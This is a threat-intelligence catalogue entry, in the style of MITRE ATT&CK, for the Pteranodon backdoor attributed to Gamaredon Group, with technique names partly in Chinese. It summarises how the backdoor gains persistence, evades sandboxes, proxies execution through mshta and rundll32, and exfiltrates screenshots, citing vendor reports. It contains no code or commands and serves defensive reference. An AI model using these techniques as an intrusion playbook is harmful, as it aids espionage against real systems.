1. Home
  2. Software
  3. Pteranodon

Pteranodon

Pteranodon is a custom backdoor used by Gamaredon Group. [1]

ID: S0147
Associated Software: Pterodo
Type: MALWARE
Platforms: Windows
Version: 2.1
Created: 31 May 2017
Last Modified: 23 August 2022

Associated Software Descriptions

Name Description
Pterodo

[2][3]
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1140 反混淆/解码文件或信息

Pteranodon can decrypt encrypted data strings prior to using them.[4]
Enterprise T1547 .001 启动或登录自动启动执行: Registry Run Keys / Startup Folder

Pteranodon copies itself to the Startup folder to establish persistence.[1]
Enterprise T1059 .003 命令与脚本解释器: Windows Command Shell

Pteranodon can use cmd.exe for execution on victim systems.[1][2]
.005 命令与脚本解释器: Visual Basic

Pteranodon can use a malicious VBS file for execution.[2]
Enterprise T1113 屏幕捕获

Pteranodon can capture screenshots at a configurable interval.[1][5]
Enterprise T1071 .001 应用层协议: Web Protocols

Pteranodon can use HTTP for C2.[1]
Enterprise T1074 .001 数据分段: Local Data Staging

Pteranodon creates various subdirectories under %Temp%\reports\% and copies files to those subdirectories. It also creates a folder at C:\Users\\AppData\Roaming\Microsoft\store to store screenshot JPEG files.[1]
Enterprise T1083 文件和目录发现

Pteranodon identifies files matching certain file extension and copies them to subdirectories it created.[1]
Enterprise T1106 本机API

Pteranodon has used various API calls.[4]
Enterprise T1027 .007 混淆文件或信息: Dynamic API Resolution

Pteranodon can use a dynamic Windows hashing algorithm to map API components.[4]
Enterprise T1070 .004 移除指标: File Deletion

Pteranodon can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.[1]
Enterprise T1218 .005 系统二进制代理执行: Mshta

Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.[2]
.011 系统二进制代理执行: Rundll32

Pteranodon executes functions using rundll32.exe.[1]
Enterprise T1497 虚拟化/沙盒规避

Pteranodon has the ability to use anti-detection functions to identify sandbox environments.[5]
Enterprise T1105 输入工具传输

Pteranodon can download and execute additional files.[1][2][5]
Enterprise T1041 通过C2信道渗出

Pteranodon exfiltrates screenshot files to its C2 server.[1]
Enterprise T1053 .005 预定任务/作业: Scheduled Task

Pteranodon schedules tasks to invoke its components in order to establish persistence.[1][2]

Groups That Use This Software

ID Name References
G0047 Gamaredon Group

[1][2][4][5][3]

References

  1. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  2. Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.
  3. Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.
  1. Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.
  2. Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.